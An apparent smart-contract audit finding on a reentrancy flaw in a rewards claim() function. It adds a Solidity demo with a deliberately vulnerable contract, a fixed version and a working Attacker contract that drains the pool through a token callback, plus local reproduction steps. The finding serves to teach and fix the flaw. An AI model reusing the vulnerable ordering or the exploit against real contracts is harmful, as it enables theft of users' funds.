The provided Solidity code contains a reentrancy vulnerability in the claim() function.
In the claim() function, the contract transfers the caller's claimable WETH with WETH.transfer(msg.sender, claimable[msg.sender]) and only afterwards sets claimable[msg.sender] = 0. This is the interaction-before-effect ordering that enables reentrancy: if the transfer hands control to the caller (for example, if the token used here notifies the recipient on transfer, as ERC777- or ERC1363-style tokens do), a malicious contract can call claim() again from that callback while claimable[msg.sender] still holds the original amount, collecting the same reward repeatedly until the contract's WETH balance is exhausted. Note that the canonical WETH9 transfer() is a plain ERC20 balance update and makes no call to the recipient, so with that exact token the re-entry path is not reachable; the ordering is nonetheless wrong and should be corrected regardless of which token is wired in.
The reentrancy vulnerability could allow an attacker to claim the same rewards repeatedly in a single transaction, draining the contract's WETH balance and causing losses for the contract and the other users whose rewards it holds. During the external call the attacker's own contract code runs before claim() has finished, so it can re-enter claim() and any other function that relies on the not-yet-updated claimable balance.
Manual Review
To mitigate the reentrancy vulnerability, the contract should follow the checks-effects-interactions pattern. Specifically, the state changes, such as updating the user's claimable balance to zero, should be made before any external interactions, such as transferring WETH to the caller. By adhering to this pattern, the contract ensures that any state changes are completed before any external contract calls, preventing reentrant attacks.
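The following is an added illustration, not the audited contract's code: a minimal rewards contract written with the vulnerable ordering next to the checks-effects-interactions version, plus an attacker contract that re-enters from the token's recipient hook. HookToken, IRewardToken, ITokenReceiver, onTokenReceived, credit(), and the attack flow are all assumptions made for the example; the hook exists only so that the transfer actually returns control to the caller, which canonical WETH9 does not do.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Added example, not the audited contract. IRewardToken is a hypothetical
// ERC20-like token whose transfer() notifies the recipient (as ERC777/ERC1363
// tokens do). Canonical WETH9.transfer() makes no such callback.
interface IRewardToken {
    function transfer(address to, uint256 amount) external returns (bool);
    function balanceOf(address who) external view returns (uint256);
}

interface ITokenReceiver {
    function onTokenReceived(address from, uint256 amount) external;
}

// Constructed token with a recipient hook so the re-entry path is reachable.
contract HookToken is IRewardToken {
    mapping(address => uint256) public balanceOf;

    function mint(address to, uint256 amount) external { balanceOf[to] += amount; }

    function transfer(address to, uint256 amount) external returns (bool) {
        require(balanceOf[msg.sender] >= amount, "insufficient");
        balanceOf[msg.sender] -= amount;
        balanceOf[to] += amount;
        // Control passes to the recipient here, before the caller resumes.
        if (to.code.length > 0) ITokenReceiver(to).onTokenReceived(msg.sender, amount);
        return true;
    }
}

// Vulnerable ordering: interaction before effect (the pattern in the finding).
contract VulnerableRewards {
    IRewardToken public immutable token;
    mapping(address => uint256) public claimable;

    constructor(IRewardToken _token) { token = _token; }

    // Unrestricted for the example only; a real contract would gate this.
    function credit(address user, uint256 amount) external { claimable[user] += amount; }

    function claim() external {
        uint256 amount = claimable[msg.sender];
        require(amount > 0, "nothing to claim");
        require(token.transfer(msg.sender, amount), "transfer failed"); // external call first
        claimable[msg.sender] = 0; // too late: a re-entrant claim() already saw the old balance
    }
}

// Fixed ordering: checks, effects, then interaction, plus a guard for defence in depth.
contract SafeRewards {
    IRewardToken public immutable token;
    mapping(address => uint256) public claimable;
    bool private locked;

    modifier nonReentrant() {
        require(!locked, "reentrant call");
        locked = true;
        _;
        locked = false;
    }

    constructor(IRewardToken _token) { token = _token; }

    function credit(address user, uint256 amount) external { claimable[user] += amount; }

    function claim() external nonReentrant {
        uint256 amount = claimable[msg.sender];                          // check
        require(amount > 0, "nothing to claim");
        claimable[msg.sender] = 0;                                       // effect, before any call out
        require(token.transfer(msg.sender, amount), "transfer failed"); // interaction last
    }
}

// Attacker: re-enters VulnerableRewards.claim() from the token's hook.
contract Attacker is ITokenReceiver {
    VulnerableRewards public immutable target;

    constructor(VulnerableRewards _target) { target = _target; }

    function attack() external { target.claim(); }

    function onTokenReceived(address, uint256 amount) external override {
        require(msg.sender == address(target.token()), "unexpected caller");
        // claimable[this] is still the original amount: the vulnerable claim()
        // has not reached its state update yet, so calling it again pays again.
        // Stop once the target cannot cover another payout, so nothing reverts.
        if (target.token().balanceOf(address(target)) >= amount) {
            target.claim();
        }
    }
}
```

To reproduce in a local test environment (Remix, Foundry or Hardhat): deploy HookToken, deploy VulnerableRewards with it, mint the rewards contract a balance several times larger than one claim, credit the Attacker address once, and call attack(); the attacker ends up holding the rewards contract's whole balance. Repeating the same steps against SafeRewards pays out exactly once, because the re-entrant call finds claimable already zeroed and reverts at the require, and the nonReentrant guard would block it even if a future change reintroduced an external call before the state update.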